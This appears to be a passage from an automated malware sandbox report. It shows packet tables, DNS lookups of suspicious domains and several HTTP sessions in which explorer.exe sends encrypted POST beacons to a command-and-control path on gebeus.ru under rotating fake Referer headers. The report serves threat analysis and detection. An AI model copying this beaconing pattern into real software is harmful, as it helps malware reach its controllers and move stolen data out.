                              Jul 6, 2024 06:17:10.507145882 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.507720947 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.507736921 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.507785082 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.507791042 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.507828951 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.507853985 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.508354902 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.508373976 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.508411884 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.508415937 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.508429050 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.508446932 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.508451939 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.508491993 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.508497953 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.508521080 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.508554935 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.509331942 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.509346962 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.509392977 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.509398937 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.509437084 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.509463072 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.510268927 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.510286093 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.510329008 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.510334015 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.510371923 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.510394096 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.511215925 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.511230946 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.511281967 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.511286974 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.511295080 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.511313915 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.511327982 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.511332035 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.511387110 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.598592997 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.598620892 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.598695040 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.598706007 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.598752022 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.599246979 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.599266052 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.599307060 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.599312067 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.599350929 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.599379063 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.600188017 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600207090 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600260019 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600270987 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.600281000 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600331068 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.600343943 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600400925 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:10.600406885 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600419998 CEST44349763162.159.133.233192.168.2.4
                              Jul 6, 2024 06:17:10.600480080 CEST49763443192.168.2.4162.159.133.233
                              Jul 6, 2024 06:17:12.749613047 CEST49763443192.168.2.4162.159.133.233

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 6, 2024 06:16:19.161792994 CEST5926753192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:20.151299000 CEST5926753192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:20.204705000 CEST53592671.1.1.1192.168.2.4
                              Jul 6, 2024 06:16:20.204724073 CEST53592671.1.1.1192.168.2.4
                              Jul 6, 2024 06:16:22.297719002 CEST6121153192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:23.483680010 CEST6121153192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:24.493504047 CEST6121153192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:24.615199089 CEST53612111.1.1.1192.168.2.4
                              Jul 6, 2024 06:16:24.615214109 CEST53612111.1.1.1192.168.2.4
                              Jul 6, 2024 06:16:24.615221977 CEST53612111.1.1.1192.168.2.4
                              Jul 6, 2024 06:16:30.693763971 CEST5312253192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:30.728915930 CEST53531221.1.1.1192.168.2.4
                              Jul 6, 2024 06:16:38.140129089 CEST5552353192.168.2.41.1.1.1
                              Jul 6, 2024 06:16:38.151638031 CEST53555231.1.1.1192.168.2.4
                              Jul 6, 2024 06:17:09.005227089 CEST5098053192.168.2.41.1.1.1
                              Jul 6, 2024 06:17:09.012180090 CEST53509801.1.1.1192.168.2.4
                              Jul 6, 2024 06:17:16.896389008 CEST6374253192.168.2.41.1.1.1

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jul 6, 2024 06:16:19.161792994 CEST192.168.2.41.1.1.10x31c1Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:20.151299000 CEST192.168.2.41.1.1.10x31c1Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:22.297719002 CEST192.168.2.41.1.1.10xe753Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:23.483680010 CEST192.168.2.41.1.1.10xe753Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.493504047 CEST192.168.2.41.1.1.10xe753Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:30.693763971 CEST192.168.2.41.1.1.10xe3c8Standard query (0)mussangroup.comA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:38.140129089 CEST192.168.2.41.1.1.10x150dStandard query (0)foodypannyjsud.shopA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:09.005227089 CEST192.168.2.41.1.1.10x862Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:16.896389008 CEST192.168.2.41.1.1.10xe7a2Standard query (0)api.msn.comA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jul 6, 2024 06:16:20.204705000 CEST1.1.1.1192.168.2.40x31c1No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:20.204724073 CEST1.1.1.1192.168.2.40x31c1No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru116.58.10.60A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru187.134.57.31A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru177.222.41.236A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru189.195.132.134A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru219.92.154.145A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru189.181.1.138A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru190.146.112.188A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru187.156.72.83A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615199089 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru185.65.254.149A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru116.58.10.60A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru187.134.57.31A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru177.222.41.236A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru189.195.132.134A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru219.92.154.145A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru189.181.1.138A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru190.146.112.188A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru187.156.72.83A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615214109 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru185.65.254.149A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru116.58.10.60A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru187.134.57.31A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru177.222.41.236A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru189.195.132.134A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru219.92.154.145A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru189.181.1.138A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru190.146.112.188A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru187.156.72.83A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:24.615221977 CEST1.1.1.1192.168.2.40xe753No error (0)gebeus.ru185.65.254.149A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:30.728915930 CEST1.1.1.1192.168.2.40xe3c8No error (0)mussangroup.com185.149.100.242A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:38.151638031 CEST1.1.1.1192.168.2.40x150dNo error (0)foodypannyjsud.shop188.114.97.3A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:16:38.151638031 CEST1.1.1.1192.168.2.40x150dNo error (0)foodypannyjsud.shop188.114.96.3A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:09.012180090 CEST1.1.1.1192.168.2.40x862No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:09.012180090 CEST1.1.1.1192.168.2.40x862No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:09.012180090 CEST1.1.1.1192.168.2.40x862No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:09.012180090 CEST1.1.1.1192.168.2.40x862No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:09.012180090 CEST1.1.1.1192.168.2.40x862No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                              Jul 6, 2024 06:17:16.903896093 CEST1.1.1.1192.168.2.40xe7a2No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • mussangroup.com
                              • foodypannyjsud.shop
                              • cdn.discordapp.com
                              • xtocgtyybbctmfi.org
                                • gebeus.ru
                              • bpcdupihqakj.com
                              • pmyyrubejsckxrog.org
                              • qoivhnmynkjuuwj.net
                              • jtduqsdpealdr.net
                              • dpjoxuhlavoox.net
                              • fdlrafionfniv.com
                              • gccqwiqvbuvikqp.org
                              • cmklqbpjgqk.org
                              • mckdxvknpnq.net
                              • yuynggabmew.net
                              • xqvppjhqsfe.org
                              • 77.221.157.163
                              • ploihvdtbwudndea.net
                              • buuohrwrsnx.org
                              • gdehhwddskytmp.org

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.44973758.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:24.621176004 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://xtocgtyybbctmfi.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 189
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:24.621190071 CEST189OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 5c dd a3
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA .[k,vuS\-71K,R8sh"F!i/-T\I:PuSJT`Y:'R
                              Jul 6, 2024 06:16:26.106266975 CEST152INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:25 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 04 00 00 00 72 e8 85 ef
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.44973858.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:26.119513988 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://bpcdupihqakj.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 292
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:26.119541883 CEST292OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 6f 4c a1 94
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vuoL;Y_p5l*ZcqcvPV?04Y:Gj%L7(P-5GsQW\"H&P|T7#sEC5\yqlXv
                              Jul 6, 2024 06:16:27.691529989 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:27 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.44973958.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:27.700069904 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://pmyyrubejsckxrog.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 113
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:27.700084925 CEST113OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 29 23 fd ab
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vu)#p[^?pb[/8
                              Jul 6, 2024 06:16:29.169231892 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:28 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.44974058.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:29.177573919 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://qoivhnmynkjuuwj.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 275
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:29.177587032 CEST275OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 51 5a b2 99
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA -[k,vuQZiYw_){f(BP|q:VV\I1,ixUNaC4o*mCDSqLdi]$qbR5.*
                              Jul 6, 2024 06:16:30.690959930 CEST206INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:30 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ef d5 7f e5 7c
                              Data Ascii: #\6U9H-anYp7vZW|


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.44974258.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:37.596297979 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://jtduqsdpealdr.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 317
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:37.596323013 CEST317OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 08 6b 2c 90 f4 76 0b 75 54 54 b2 f8
                              Data Ascii: ;nVe.{~lv~{Ch. tjP? 9Yt M@NA ,[k,vuTTpGe| >r4b4(R_zxL/Az1)=-CN@|5ruFV k_8xA=_x(rU!X#f
                              Jul 6, 2024 06:16:39.117182016 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 06 Jul 2024 04:16:38 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.44974458.151.148.90802580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Jul 6, 2024 06:16:39.423295021 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://dpjoxuhlavoox.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 179
                              Host: gebeus.ru
                              Jul 6, 2024 06:16:39.423295021 CEST179OUTData Raw: 3b 6e 56 65 f5 cb 1b 2e d6 a3 b7 03 07 04 7b be 0c 7e b9 90 6c 76 91 15 7e 7b 08 95 43 b3 ce 68 99 2e b1 20 74 6a 50 1e e7 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3f 33 e4 9c
